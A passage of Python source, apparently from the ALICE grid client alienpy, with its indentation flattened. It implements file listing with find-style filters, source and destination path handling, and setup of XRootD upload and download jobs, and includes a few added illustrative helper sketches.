def file2file_dict(fn: str) -> dict:
"""Take a string as path and retur a dict with file propreties"""
try:
file_path = Path(fn)
except Exception:
return {}
try:
file_name = file_path.expanduser().resolve(strict = True).as_posix()
except Exception:
return {}
file_dict = {"file": file_name}
file_dict["lfn"] = file_name
file_dict["size"] = str(file_path.stat().st_size)
file_dict["mtime"] = str(int(file_path.stat().st_mtime * 1000))
file_dict["md5"] = md5(file_name)
file_dict["owner"] = pwd.getpwuid(file_path.stat().st_uid).pw_name
file_dict["gowner"] = gid2name(file_path.stat().st_gid)
return file_dict
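# Illustrative sketch, not part of the original module: properties gathered for
# a small temporary file (size and mtime are strings, as the upload code expects).
def _example_file2file_dict() -> None:
    import tempfile
    with tempfile.NamedTemporaryFile(delete = False) as tmp:
        tmp.write(b'data')
    props = file2file_dict(tmp.name)
    assert props['size'] == '4' and len(props['md5']) == 32
    os.remove(tmp.name)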
def filter_file_prop(f_obj: dict, base_dir: str, find_opts: Union[str, list, None]) -> bool:
"""Return True if an file dict object pass the conditions in find_opts"""
if not f_obj or not base_dir: return False
if not find_opts: return True
opts = find_opts.split() if isinstance(find_opts, str) else find_opts.copy()
min_depth = get_arg_value(opts, '-min_depth')
if min_depth and min_depth.startswith("-"):
print_err(f'filter_file_prop::Missing argument in list:: {" ".join(opts)}')
return False
max_depth = get_arg_value(opts, '-max_depth')
if max_depth and max_depth.startswith("-"):
print_err(f'filter_file_prop::Missing argument in list:: {" ".join(opts)}')
return False
min_size = get_arg_value(opts, '-min_size')
if min_size and min_size.startswith("-"):
print_err(f'filter_file_prop::Missing argument in list:: {" ".join(opts)}')
return False
max_size = get_arg_value(opts, '-max_size')
if max_size and max_size.startswith("-"):
print_err(f'filter_file_prop::Missing argument in list:: {" ".join(opts)}')
return False
min_ctime = get_arg_value(opts, '-min_ctime')
if min_ctime and min_ctime.startswith("-"):
print_err(f'filter_file_prop::Missing argument in list:: {" ".join(opts)}')
return False
max_ctime = get_arg_value(opts, '-max_ctime')
if max_ctime and max_ctime.startswith("-"):
print_err(f'filter_file_prop::Missing argument in list:: {" ".join(opts)}')
return False
jobid = get_arg_value(opts, '-jobid')
if jobid and jobid.startswith("-"):
print_err(f'filter_file_prop::Missing argument in list:: {" ".join(opts)}')
return False
user = get_arg_value(opts, '-user')
if user and user.startswith("-"):
print_err(f'filter_file_prop::Missing argument in list:: {" ".join(opts)}')
return False
group = get_arg_value(opts, '-group')
if group and group.startswith("-"):
print_err(f'filter_file_prop::Missing argument in list:: {" ".join(opts)}')
return False
if min_depth or max_depth:
lfn = get_lfn_key(f_obj)
relative_lfn = lfn.replace(base_dir, '') # it will have N directories + 1 file components
if min_depth:
min_depth = abs(int(min_depth)) + 1 # add +1 for the always present file component of relative_lfn
if len(relative_lfn.split('/')) < int(min_depth): return False
if max_depth:
max_depth = abs(int(max_depth)) + 1 # add +1 for the always present file component of relative_lfn
if len(relative_lfn.split('/')) > int(max_depth): return False
if min_size and int(f_obj["size"]) < abs(int(min_size)): return False
if max_size and int(f_obj["size"]) > abs(int(max_size)): return False
if user and f_obj["owner"] != user: return False
if group and f_obj["gowner"] != group: return False
# the argument can be a string with a form like: '20.12.2016 09:38:42,76','%d.%m.%Y %H:%M:%S,%f'
# see: https://docs.python.org/3.6/library/datetime.html#strftime-strptime-behavior
if min_ctime:
min_ctime = time_str2unixmili(min_ctime)
if int(f_obj["ctime"]) < min_ctime: return False
if max_ctime:
max_ctime = time_str2unixmili(max_ctime)
if int(f_obj["ctime"]) > max_ctime: return False
if jobid:
if "jobid" not in f_obj: return False
if f_obj["jobid"] != jobid: return False
return True
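# Illustrative sketch, not part of the original module: a minimal hypothetical
# file-properties dict checked against a few find-style filters.
def _example_filter_file_prop() -> None:
    f_obj = {'lfn': '/alice/data/run1/f.root', 'size': '2048', 'owner': 'auser', 'gowner': 'agroup', 'ctime': '1600000000000'}
    assert filter_file_prop(f_obj, '/alice/data/', ['-min_size', '1024'])
    assert not filter_file_prop(f_obj, '/alice/data/', ['-min_size', '4096'])
    assert filter_file_prop(f_obj, '/alice/data/', ['-user', 'auser', '-max_depth', '2'])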
def list_files_grid(wb, dir: str, pattern: Union[None, REGEX_PATTERN_TYPE, str] = None, is_regex: bool = False, find_args: str = '') -> RET:
"""Return a list of files(lfn/grid files) that match pattern found in dir
Returns a RET object (from find), and takes: wb, directory, pattern, is_regex, find_args"""
if not dir: return RET(-1, "", "No search directory specified")
# let's process the pattern: extract it from src if it is in path-globbing form
is_single_file = False # dir may actually point to a file
dir_arg_list = dir.split()
if len(dir_arg_list) > 1: # dir is actually a list of arguments
if not pattern: pattern = dir_arg_list.pop(-1)
dir = dir_arg_list.pop(-1)
if dir_arg_list: find_args = ' '.join(dir_arg_list)
if '*' in dir: # we have globbing in src path
is_regex = False
src_arr = dir.split("/")
base_path_arr = [] # let's establish the base path
for el in src_arr:
if '*' not in el:
base_path_arr.append(el)
else:
break
for el in base_path_arr: src_arr.remove(el) # remove the base path
dir = '/'.join(base_path_arr) + '/' # rewrite the source path without the globbing part
pattern = '/'.join(src_arr) # the globbing part is the rest of the elements that contain *
else: # pattern is specified by argument
if pattern is None:
if not dir.endswith('/'): # this is a single file
is_single_file = True
else:
pattern = '*' # prefer globbing as default
elif type(pattern) is REGEX_PATTERN_TYPE: # unlikely but supported to match signatures
pattern = pattern.pattern # We pass the regex pattern into command as string
is_regex = True
if is_regex and type(pattern) is str: # it was explicitly requested that pattern is regex
if valid_regex(pattern) is None:
logging.error(f"list_files_grid:: {pattern} failed to re.compile")
return RET(-1, "", f"list_files_grid:: {pattern} failed to re.compile")
# remove default from additional args
find_args_list = None
filter_args_list = []
if find_args:
find_args_list = find_args.split()
get_arg(find_args_list, '-a')
get_arg(find_args_list, '-s')
get_arg(find_args_list, '-f')
get_arg(find_args_list, '-d')
get_arg(find_args_list, '-w')
get_arg(find_args_list, '-wh')
min_depth = get_arg_value(find_args_list, '-min_depth')
if min_depth:
if min_depth.startswith("-"): print_err(f'filter_file_prop::Missing argument in list:: {" ".join(find_args_list)}')
filter_args_list.extend(['-min_depth', min_depth])
max_depth = get_arg_value(find_args_list, '-max_depth')
if max_depth:
if max_depth.startswith("-"): print_err(f'filter_file_prop::Missing argument in list:: {" ".join(find_args_list)}')
filter_args_list.extend(['-max_depth', max_depth])
min_size = get_arg_value(find_args_list, '-min_size')
if min_size:
if min_size.startswith("-"): print_err(f'filter_file_prop::Missing argument in list:: {" ".join(find_args_list)}')
filter_args_list.extend(['-min_size', min_size])
max_size = get_arg_value(find_args_list, '-max_size')
if max_size:
if max_size.startswith("-"): print_err(f'filter_file_prop::Missing argument in list:: {" ".join(find_args_list)}')
filter_args_list.extend(['-max_size', max_size])
min_ctime = get_arg_value(find_args_list, '-min_ctime')
if min_ctime:
if min_ctime.startswith("-"): print_err(f'filter_file_prop::Missing argument in list:: {" ".join(find_args_list)}')
filter_args_list.extend(['-min_ctime', min_ctime])
max_ctime = get_arg_value(find_args_list, '-max_ctime')
if max_ctime:
if max_ctime.startswith("-"): print_err(f'filter_file_prop::Missing argument in list:: {" ".join(find_args_list)}')
filter_args_list.extend(['-max_ctime', max_ctime])
jobid = get_arg_value(find_args_list, '-jobid')
if jobid:
if jobid.startswith("-"): print_err(f'filter_file_prop::Missing argument in list:: {" ".join(find_args_list)}')
filter_args_list.extend(['-jobid', jobid])
user = get_arg_value(find_args_list, '-user')
if user:
if user.startswith("-"): print_err(f'filter_file_prop::Missing argument in list:: {" ".join(find_args_list)}')
filter_args_list.extend(['-user', user])
group = get_arg_value(find_args_list, '-group')
if group:
if group.startswith("-"): print_err(f'filter_file_prop::Missing argument in list:: {" ".join(find_args_list)}')
filter_args_list.extend(['-group', group])
# create and return the list object just for a single file
if is_single_file:
send_opts = 'nomsg' if not _DEBUG else ''
ret_obj = SendMsg(wb, 'stat', [dir], opts = send_opts)
else:
find_args_default = ['-f', '-a', '-s']
if is_regex: find_args_default.insert(0, '-r')
if find_args_list: find_args_default.extend(find_args_list) # insert any other additional find arguments
find_args_default.append(dir)
find_args_default.append(pattern)
send_opts = 'nomsg' if not _DEBUG else ''
ret_obj = SendMsg(wb, 'find', find_args_default, opts = send_opts)
if ret_obj.exitcode != 0:
logging.error(f"list_files_grid error:: {dir} {pattern} {find_args}")
return ret_obj
if 'results' not in ret_obj.ansdict or not ret_obj.ansdict["results"]:
logging.error(f"list_files_grid exitcode==0 but no results(!!!):: {dir} /pattern: {pattern} /find_args: {find_args}")
return RET(2, "", f"No files found in :: {dir} /pattern: {pattern} /find_args: {find_args}")
exitcode = ret_obj.exitcode
stderr = ret_obj.err
results_list = ret_obj.ansdict["results"]
results_list_filtered = []
# items that pass the conditions are the actual/final results
for found_lfn_dict in results_list: # parse results to apply filters
if not filter_file_prop(found_lfn_dict, dir, filter_args_list): continue
# at this point all filters were passed
results_list_filtered.append(found_lfn_dict)
if not results_list_filtered:
return RET(2, "", f"No files passed the filters :: {dir} /pattern: {pattern} /find_args: {find_args}")
ansdict = {"results": results_list_filtered}
lfn_list = [get_lfn_key(lfn_obj) for lfn_obj in results_list_filtered]
stdout = '\n'.join(lfn_list)
return RET(exitcode, stdout, stderr, ansdict)
def list_files_local(dir: str, pattern: Union[None, REGEX_PATTERN_TYPE, str] = None, is_regex: bool = False, find_args: str = '') -> RET:
"""Return a list of files(local)(N.B! ONLY FILES) that match pattern found in dir"""
if not dir: return RET(2, "", "No search directory specified")
# let's process the pattern: extract it from src if it is in path-globbing form
regex = None
is_single_file = False # dir actually point to a file
if '*' in dir: # we have globbing in src path
is_regex = False
src_arr = dir.split("/")
base_path_arr = [] # let's establish the base path
for el in src_arr:
if '*' not in el:
base_path_arr.append(el)
else:
break
for el in base_path_arr: src_arr.remove(el) # remove the base path
dir = '/'.join(base_path_arr) + '/' # rewrite the source path without the globbing part
pattern = '/'.join(src_arr) # the globbing part is the rest of the elements that contain *
else: # pattern is specified by argument or not specified
if pattern is None:
if not dir.endswith('/'): # this is a single file
is_single_file = True
else:
pattern = '*' # prefer globbing as default
elif type(pattern) is REGEX_PATTERN_TYPE: # unlikely but supported to match signatures
regex = pattern
is_regex = True
elif type(pattern) is str and is_regex: # it was explicitly requested that pattern is regex
regex = valid_regex(pattern)
if regex is None:
logging.error(f"list_files_grid:: {pattern} failed to re.compile")
return RET(-1, "", f"list_files_grid:: {pattern} failed to re.compile")
directory = None # resolve start_dir to an absolute_path
try:
directory = Path(dir).expanduser().resolve(strict = True).as_posix()
except FileNotFoundError:
return RET(2, "", f"{dir} not found")
except RuntimeError:
return RET(2, "", f"Loop encountered along the resolution of {dir}")
filter_args_list = None
if find_args: filter_args_list = find_args.split() # for local files listing we have only filtering options
file_list = None # make a list of filepaths (that match a regex or a glob)
if is_single_file:
file_list = [directory]
elif is_regex:
file_list = [os.path.join(root, f) for (root, dirs, files) in os.walk(directory) for f in files if regex.match(os.path.join(root, f))]
else:
file_list = [p.expanduser().resolve(strict = True).as_posix() for p in list(Path(directory).glob(f'**/{pattern}')) if p.is_file()]
if not file_list:
return RET(2, "", f"No files found in :: {str} /pattern: {pattern} /find_args: {find_args}")
# convert the file_list to a list of file properties dictionaries
results_list = [file2file_dict(filepath) for filepath in file_list]
results_list_filtered = []
# items that pass the conditions are the actual/final results
for found_lfn_dict in results_list: # parse results to apply filters
if not filter_file_prop(found_lfn_dict, directory, filter_args_list): continue
# at this point all filters were passed
results_list_filtered.append(found_lfn_dict)
if not results_list_filtered:
return RET(2, "", f"No files passed the filters :: {str} /pattern: {pattern} /find_args: {find_args}")
ansdict = {"results": results_list_filtered}
lfn_list = [get_lfn_key(lfn_obj) for lfn_obj in results_list_filtered]
stdout = '\n'.join(lfn_list)
return RET(0, stdout, '', ansdict)
def extract_glob_pattern(path_arg: str) -> tuple:
"""Extract glob pattern from a path"""
if not path_arg: return None, None
base_path = pattern = None
if '*' in path_arg: # we have globbing in src path
path_components = path_arg.split("/")
base_path_arr = [] # let's establish the base path
for el in path_components:
if '*' not in el: base_path_arr.append(el)
else: break
for el in base_path_arr: path_components.remove(el) # remove the base path components (those without *) from full path components
base_path = '/'.join(base_path_arr) + '/' # rewrite the source path without the globbing part
pattern = '/'.join(path_components) # the globbing part is the rest of the elements that contain *
else:
base_path = path_arg
return (base_path, pattern)
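# Illustrative sketch, not part of the original module: splitting hypothetical
# paths into a base path and the globbing remainder.
def _example_extract_glob_pattern() -> None:
    assert extract_glob_pattern('/alice/data/*/pass1/*.root') == ('/alice/data/', '*/pass1/*.root')
    assert extract_glob_pattern('/alice/data/f.root') == ('/alice/data/f.root', None)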
def check_path(wb, path_arg: str, check_path: bool = False) -> tuple:
"""Check if path exists and what kind; returns the resolved path and the location"""
location = 'grid' # default location is grid; MANDATORY specification of file: for local
filepath = None
if path_arg.startswith('file:'): location = 'local'
path_arg = lfn_prefix_re.sub('', path_arg) # lets remove any prefixes
filepath = path_arg
if check_path:
if location == 'local': filepath = expand_path_local(path_arg, check_path = True)
if location == 'grid': filepath = expand_path_grid(wb, path_arg, check_path = True)
return (filepath, location)
def makelist_lfn(wb, arg_source, arg_target, find_args: list, parent: int, overwrite: bool, pattern: Union[None, REGEX_PATTERN_TYPE, str], is_regex: bool, copy_list: list, strictspec: bool = False, httpurl: bool = False) -> RET: # pylint: disable=unused-argument
"""Process a source and destination copy arguments and make a list of individual lfns to be copied"""
isSrcDir = isDstDir = isSrcLocal = isDownload = specs = None # make sure we set these to valid values later
# lets extract the specs from both src and dst if any (to clean up the file-paths) and record specifications like disk=3,SE1,!SE2
src_specs_remotes = specs_split.split(arg_source, maxsplit = 1) # NO comma allowed in names (hopefully)
arg_src = src_specs_remotes.pop(0) # first item is the file path; what remains are the disk specifications
src_specs = src_specs_remotes.pop(0) if src_specs_remotes else None # whatever remains is the specifications
dst_specs_remotes = specs_split.split(arg_target, maxsplit = 1)
arg_dst = dst_specs_remotes.pop(0)
dst_specs = dst_specs_remotes.pop(0) if dst_specs_remotes else None
# let's process the pattern: extract it from src if it is in path-globbing form
src_glob = False
if '*' in arg_src: # we have globbing in src path
src_glob = True
arg_src, pattern = extract_glob_pattern(arg_src)
else: # pattern is specified by argument
if type(pattern) is REGEX_PATTERN_TYPE: # unlikely but supported to match signatures
pattern = pattern.pattern # We pass the regex pattern into command as string
is_regex = True
if is_regex and type(pattern) is str: # it was explicitly requested that pattern is regex
if valid_regex(pattern) is None:
msg = f"makelist_lfn:: {pattern} failed to re.compile"
logging.error(msg)
return RET(64, '', msg) # EX_USAGE /* command line usage error */
slashend_src = arg_src.endswith('/') # after extracting the globbing if present we record the slash
# N.B.!!! the check will be wrong when the same relative path is present both locally and on the grid
# first let's check only prefixes
src, src_type = check_path(wb, arg_src, check_path = False)
dst, dst_type = check_path(wb, arg_dst, check_path = False) # do not check path, it can be missing and then auto-created
if src_type == dst_type == 'grid':
return RET(1, '', 'grid to grid copy is WIP; for the moment use two steps: download the file and upload it; local src/dst should ALWAYS be prefixed with file:')
if src_type == dst_type == 'local':
return RET(1, '', 'for local copy use a system command; within the interactive shell start a system command with "!"')
isSrcLocal = (src_type == 'local')
if isSrcLocal:
src = expand_path_local(src, check_path = True)
dst = expand_path_grid(wb, dst, check_path = False)
else:
src = expand_path_grid(wb, src, check_path = True)
dst = expand_path_local(dst, check_path = False)
if not src: return RET(2, '', f'{arg_src} => {src} does not exist (or not accessible) on {src_type}') # ENOENT /* No such file or directory */
if slashend_src and not src.endswith('/'): src = f"{src}/" # recover the slash if lost
if src.endswith('/') and not dst.endswith('/'): dst = f"{dst}/"
isDstDir = isSrcDir = src.endswith('/') # if src is a dir then dst must be one too
isDownload = not isSrcLocal
if isSrcDir and not src_glob and not slashend_src: parent = parent + 1 # cp/rsync convention: with / copy the contents, without it copy the actual dir
if isDownload:
try: # we can try anyway, this is like mkdir -p
mk_path = Path(dst) if dst.endswith('/') else Path(dst).parent # if destination is a file, create its parent dir
mk_path.mkdir(parents=True, exist_ok=True)
except Exception:
logging.error(traceback.format_exc())
msg = f"Could not create local destination directory: {mk_path.as_posix()}\ncheck log file {_DEBUG_FILE}"
return RET(42, '', msg) # ENOMSG /* No message of desired type */
else: # this is upload to GRID
mk_path = dst if dst.endswith('/') else Path(dst).parent.as_posix()
ret_obj = SendMsg(wb, 'mkdir', ['-p', mk_path], opts = 'nomsg') # do it anyway, there is no point in checking before
if retf_print(ret_obj, opts = 'noprint err') != 0: return ret_obj # just return the mkdir result
specs = src_specs if isDownload else dst_specs # only the grid path can have specs
specs_list = specs_split.split(specs) if specs else []
if strictspec: print_out("Strict specifications were enabled!! Command may fail!!")
if httpurl and isSrcLocal:
print_out("httpurl option is ignored for uploads")
httpurl = False
error_msg = '' # container which accumulates the error messages
isWrite = not isDownload
if isDownload: # pylint: disable=too-many-nested-blocks # src is GRID, we are DOWNLOADING from GRID directory
results_list = list_files_grid(wb, src, pattern, is_regex, " ".join(find_args))
if "results" not in results_list.ansdict or len(results_list.ansdict["results"]) < 1:
msg = f"No files found with: find {' '.join(find_args)} {'-r' if is_regex else ''} -a -s {src} {pattern}"
return RET(42, '', msg) # ENOMSG /* No message of desired type */
for lfn_obj in results_list.ansdict["results"]: # make CopyFile objs for each lfn
lfn = get_lfn_key(lfn_obj)
dst_filename = format_dst_fn(src, lfn, dst, parent)
if os.path.isfile(dst_filename):
if not overwrite:
print_out(f'{dst_filename} exists, skipping..')
continue
# -f (force) was used
file_size = lfn_obj['size']
file_md5 = lfn_obj['md5']
if retf_print(fileIsValid(dst_filename, file_size, file_md5)) == 0:
continue # destination exists and is valid, no point to re-download
tokens = lfn2fileTokens(wb, lfn2file(lfn, dst_filename), specs_list, isWrite, strictspec, httpurl)
if not tokens or 'answer' not in tokens: continue
copy_list.append(CopyFile(lfn, dst_filename, isWrite, tokens['answer'], lfn))
else: # src is LOCAL, we are UPLOADING from LOCAL directory
results_list = list_files_local(src, pattern, is_regex, " ".join(find_args))
if "results" not in results_list.ansdict or len(results_list.ansdict["results"]) < 1:
msg = f"No files found in: {src} /pattern: {pattern} /find_args: {' '.join(find_args)}"
return RET(42, '', msg) # ENOMSG /* No message of desired type */
for file in results_list.ansdict["results"]:
file_path = get_lfn_key(file)
lfn = format_dst_fn(src, file_path, dst, parent)
if pathtype_grid(wb, lfn) == 'f': # lfn exists
if not overwrite:
print_out(f'{lfn} exists, skipping..')
continue
print_out(f'{lfn} exists, deleting..') # we want to overwrite so clear up the destination lfn
ret_obj = SendMsg(wb, 'rm', ['-f', lfn], opts = 'nomsg')
tokens = lfn2fileTokens(wb, lfn2file(lfn, file_path), specs_list, isWrite, strictspec)
if not tokens or 'answer' not in tokens: continue
copy_list.append(CopyFile(file_path, lfn, isWrite, tokens['answer'], lfn))
return RET(1, '', error_msg) if error_msg else RET(0)
def makelist_xrdjobs(copylist_lfns: list, copylist_xrd: list):
"""Process a list of lfns to add to XRootD copy jobs list"""
for cpfile in copylist_lfns:
if 'results' not in cpfile.token_request:
print_err(f"No token info for {cpfile}\nThis message should not happen! Please contact the developer if you see this!")
continue
if len(cpfile.token_request['results']) < 1:
print_err(f'Could not find working replicas for {cpfile.src}')
continue
if cpfile.isUpload: # src is local, dst is lfn, request is replica(pfn)
for replica in cpfile.token_request['results']:
copylist_xrd.append(CopyFile(cpfile.src, f"{replica['url']}?xrd.wantprot=unix&authz={replica['envelope']}", cpfile.isUpload, replica, cpfile.dst))
else: # src is lfn(remote), dst is local, request is replica(pfn)
size_4meta = cpfile.token_request['results'][0]['size'] # size SHOULD be the same for all replicas
md5_4meta = cpfile.token_request['results'][0]['md5'] # the md5 hash SHOULD be the same for all replicas
file_in_zip = None
url_list_4meta = []
for replica in cpfile.token_request['results']:
url_components = replica['url'].rsplit('#', maxsplit = 1)
if len(url_components) > 1: file_in_zip = url_components[1]
# if is_pfn_readable(url_components[0]): # it is a lot cheaper to check readability of replica than to try and fail a non-working replica
url_list_4meta.append(f'{url_components[0]}?xrd.wantprot=unix&authz={replica["envelope"]}')
# Create the metafile as a temporary uuid5 named file (the lfn can be retrieved from meta if needed)
metafile = create_metafile(make_tmp_fn(cpfile.src, '.meta4', uuid5 = True), cpfile.src, cpfile.dst, size_4meta, md5_4meta, url_list_4meta)
if not metafile:
print_err(f"Could not create the download metafile for {cpfile.src}")
continue
if file_in_zip and 'ALIENPY_NOXRDZIP' not in os.environ: metafile = f'{metafile}?xrdcl.unzip={file_in_zip}'
if _DEBUG: print_out(f'makelist_xrdjobs:: {metafile}')
copylist_xrd.append(CopyFile(metafile, cpfile.dst, cpfile.isUpload, {}, cpfile.src)) # we do not need the tokens in job list when downloading
def DO_XrootdCp(wb, xrd_copy_command: Union[None, list] = None, printout: str = '') -> RET:
"""XRootD cp function :: process list of arguments for a xrootd copy command"""
if not _HAS_XROOTD: return RET(1, "", 'DO_XrootdCp:: python XRootD module not found or lower than 5.3.3, the copy process cannot continue')
if xrd_copy_command is None: xrd_copy_command = []
global AlienSessionInfo
if not wb: return RET(107, "", 'DO_XrootdCp:: websocket not found') # ENOTCONN /* Transport endpoint is not connected */
if not xrd_copy_command or len(xrd_copy_command) < 2 or is_help(xrd_copy_command):
help_msg = xrdcp_help()
return RET(0, help_msg)
# XRootD copy parameters
# inittimeout: copy initialization timeout(int)
# tpctimeout: timeout for a third-party copy to finish(int)
# coerce: ignore file usage rules, i.e. apply `FORCE` flag to open() (bool)
# checksummode: checksum mode to be used (string)
# checksumtype: type of the checksum to be computed (string)
# checksumpreset: pre-set checksum instead of computing it (string)
hashtype = str('md5')
batch = int(1) # from a list of copy jobs, start <batch> number of downloads
sources = int(1) # max number of download sources
streams = int(1) # uses num additional parallel streams to do the transfer; use defaults from XrdCl/XrdClConstants.hh
chunks = int(4) # number of chunks that should be requested in parallel; use defaults from XrdCl/XrdClConstants.hh
chunksize = int(8388608) # chunk size for remote transfers; use defaults from XrdCl/XrdClConstants.hh
makedir = bool(True) # create the parent directories when creating a file
overwrite = bool(False) # overwrite target if it exists
posc = bool(True) # persist on successful close; Files are automatically deleted should they not be successfully closed.
cksum = bool(False)
timeout = int(0)
rate = int(0)
# xrdcp parameters (used by ALICE tests)
# http://xrootd.org/doc/man/xrdcp.1.html
# xrootd defaults https://github.com/xrootd/xrootd/blob/master/src/XrdCl/XrdClConstants.hh
# TODO these will not work for xrdcp subprocess; the env vars should also be set
# Resolution for the timeout events. Ie. timeout events will be processed only every XRD_TIMEOUTRESOLUTION seconds.
if not os.getenv('XRD_TIMEOUTRESOLUTION'): XRD_EnvPut('TimeoutResolution', int(1)) # let's check the status every 1s
# Number of connection attempts that should be made (number of available connection windows) before declaring a permanent failure.
if not os.getenv('XRD_CONNECTIONRETRY'): XRD_EnvPut('ConnectionRetry', int(3))
# A time window for the connection establishment. A connection failure is declared if the connection is not established within the time window.
# N.B.!!. If a connection failure happens earlier then another connection attempt will only be made at the beginning of the next window
if not os.getenv('XRD_CONNECTIONWINDOW'): XRD_EnvPut('ConnectionWindow', int(10))
# Default value for the time after which an error is declared if it was impossible to get a response to a request.
if not os.getenv('XRD_REQUESTTIMEOUT'): XRD_EnvPut('RequestTimeout', int(30))
# Maximum time allowed for the copy process to initialize, ie. open the source and destination files.
if not os.getenv('XRD_CPINITTIMEOUT'): XRD_EnvPut('CPInitTimeout', int(30))
# Time period after which an idle connection to a data server should be closed.
if not os.getenv('XRD_DATASERVERTTL'): XRD_EnvPut('DataServerTTL', int(20)) # we have no reasons to keep idle connections
# Time period after which an idle connection to a manager or a load balancer should be closed.
if not os.getenv('XRD_LOADBALANCERTTL'): XRD_EnvPut('LoadBalancerTTL', int(30)) # we have no reasons to keep idle connections
# If set the client tries first IPv4 address (turned off by default).
if not os.getenv('XRD_PREFERIPV4'): XRD_EnvPut('PreferIPv4', int(1))
if get_arg(xrd_copy_command, '-noxrdzip'): os.environ["ALIENPY_NOXRDZIP"] = "nozip"
_use_system_xrdcp = get_arg(xrd_copy_command, '-xrdcp')
overwrite = get_arg(xrd_copy_command, '-f')
posc = get_arg(xrd_copy_command, '-P')
cksum = get_arg(xrd_copy_command, '-cksum')
tpc = 'none'
if get_arg(xrd_copy_command, '-tpc'): tpc = 'first'
if tpc != 'none': return RET(1, "", 'DO_XrootdCp:: TPC is not allowed!!')
y_arg_val = get_arg_value(xrd_copy_command, '-y')
# sources = int(y_arg_val)
if y_arg_val: print_out("Ignored option! multiple source usage is known to break files stored in zip files, so this option is ignored")
streams_arg = get_arg_value(xrd_copy_command, '-S')
if streams_arg:
streams = int(streams_arg)
if streams > 15: streams = 15
batch = 8 # a nice enough default
batch_arg = get_arg_value(xrd_copy_command, '-T')
if batch_arg: batch = int(batch_arg)
chunks_arg = get_arg_value(xrd_copy_command, '-chunks')
if chunks_arg: chunks = int(chunks_arg)
chunksz_arg = get_arg_value(xrd_copy_command, '-chunksz')
if chunksz_arg: chunksize = int(chunksz_arg)
timeout_arg = get_arg_value(xrd_copy_command, '-timeout')
if timeout_arg:
timeout = int(timeout_arg)
XRD_EnvPut('CPTimeout', timeout)
rate_arg = get_arg_value(xrd_copy_command, '-ratethreshold')
if rate_arg:
rate = int(rate_arg)
XRD_EnvPut('XRateThreshold', rate)
XRD_EnvPut('CpRetryPolicy', 'force')
retry_arg = get_arg_value(xrd_copy_command, '-retry')
if retry_arg:
retry = int(retry_arg)
XRD_EnvPut('CpRetry', retry)
# options for envelope request
strictspec = get_arg(xrd_copy_command, '-strictspec')
httpurl = get_arg(xrd_copy_command, '-http')
# keep this many path components into destination filepath
parent = int(0)
parent_arg = get_arg_value(xrd_copy_command, '-parent')
if parent_arg: parent = int(parent_arg)
# find options for recursive copy of directories
find_args = []
if get_arg(xrd_copy_command, '-v'): print_out("Verbose mode not implemented, ignored; enable debugging with ALIENPY_DEBUG=1")
if get_arg(xrd_copy_command, '-a'): print_out("-a is enabled as default")
if get_arg(xrd_copy_command, '-s'): print_out("-s is enabled as default")
if get_arg(xrd_copy_command, '-f'): print_out("-f API flag not useful for copy operations")
if get_arg(xrd_copy_command, '-w'): print_out("-w flag not useful for copy operations")
if get_arg(xrd_copy_command, '-wh'): print_out("-wh flag not useful for copy operations")
if get_arg(xrd_copy_command, '-d'): print_out("-d flag not useful for copy operations")
mindepth_arg = get_arg_value(xrd_copy_command, '-mindepth')
if mindepth_arg: find_args.extend(['-mindepth', mindepth_arg])
maxdepth_arg = get_arg_value(xrd_copy_command, '-maxdepth')
if maxdepth_arg: find_args.extend(['-maxdepth', maxdepth_arg])
qid = get_arg_value(xrd_copy_command, '-j')
if qid: find_args.extend(['-j', qid])
files_limit = get_arg_value(xrd_copy_command, '-l')
if files_limit: find_args.extend(['-l', files_limit])
offset = get_arg_value(xrd_copy_command, '-o')
if offset: find_args.extend(['-o', offset])
use_regex = False
filtering_enabled = False
pattern = get_arg_value(xrd_copy_command, '-glob')
if pattern:
use_regex = False
filtering_enabled = True
pattern_regex = None
select_arg = get_arg_value(xrd_copy_command, '-select')
if select_arg:
if filtering_enabled:
msg = "Only one rule of selection can be used, either -select (full path match), -name (match on file name) or -glob (globbing)"
return RET(22, '', msg) # EINVAL /* Invalid argument */
pattern_regex = select_arg
use_regex = True
filtering_enabled = True
name_arg = get_arg_value(xrd_copy_command, '-name')
if name_arg:
if filtering_enabled:
msg = "Only one rule of selection can be used, either -select (full path match), -name (match on file name) or -glob (globbing)"
return RET(22, '', msg) # EINVAL /* Invalid argument */
use_regex = True
filtering_enabled = True
pattern_regex = name2regex(name_arg)
if use_regex and not pattern_regex:
msg = ("-name :: No selection verbs were recognized!"
"usage format is -name <attribute>_<string> where attribute is one of: begin, contain, ends, ext"
f"The invalid pattern was: {pattern_regex_arg}")
return RET(22, '', msg) # EINVAL /* Invalid argument */
if use_regex: pattern = pattern_regex
copy_lfnlist = [] # list of lfn copy tasks
input_file = '' # input file with <source, destination> pairs
inputfile_arg = get_arg_value(xrd_copy_command, '-input')
if inputfile_arg:
cp_arg_list = fileline2list(inputfile_arg)
if not cp_arg_list: return RET(1, '', f'Input file {inputfile_arg} not found or invalid content')
for cp_line in cp_arg_list:
cp_line_items = cp_line.strip().split()
if len(cp_line_items) != 2:
print_out(f'Line skipped, it does not have exactly 2 arguments => {cp_line.strip()}')
continue
retobj = makelist_lfn(wb, cp_line_items[0], cp_line_items[1], find_args, parent, overwrite, pattern, use_regex, copy_lfnlist, strictspec, httpurl)
retf_print(retobj, "noout err") # print error and continue with the other files
else:
retobj = makelist_lfn(wb, xrd_copy_command[-2], xrd_copy_command[-1], find_args, parent, overwrite, pattern, use_regex, copy_lfnlist, strictspec, httpurl)
if retobj.exitcode != 0: return retobj # if any error let's just return what we got
if not copy_lfnlist: # at this point if any errors, the processing was already stopped
return RET(0)
if _DEBUG:
logging.debug("We are going to copy these files:")
for file in copy_lfnlist: logging.debug(file)
# create a list of copy jobs to be passed to XRootD mechanism
xrdcopy_job_list = []
makelist_xrdjobs(copy_lfnlist, xrdcopy_job_list)
if not xrdcopy_job_list:
msg = "No XRootD operations in list! enable the DEBUG mode for more info"
logging.info(msg)
return RET(2, '', msg) # ENOENT /* No such file or directory */
if _DEBUG:
logging.debug("XRootD copy jobs:")
for file in xrdcopy_job_list: logging.debug(file)
msg1 = msg2 = msg3 = msg_sum = ''
copy_jobs_nr = copy_jobs_nr1 = copy_jobs_nr2 = 0
copy_jobs_failed_nr = copy_jobs_failed_nr1 = copy_jobs_failed_nr2 = 0
copy_jobs_success_nr = copy_jobs_success_nr1 = copy_jobs_success_nr2 = 0
my_cp_args = XrdCpArgs(overwrite, batch, sources, chunks, chunksize, makedir, tpc, posc, hashtype, streams, cksum, timeout, rate)
# defer the list of url and files to xrootd processing - actual XRootD copy takes place
